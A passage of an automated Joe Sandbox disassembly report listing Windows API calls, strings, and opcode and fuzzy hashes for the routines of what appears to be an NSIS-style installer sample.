                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • soft, xrefs: 00403020
                                                                                                            • Inst, xrefs: 00403017
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
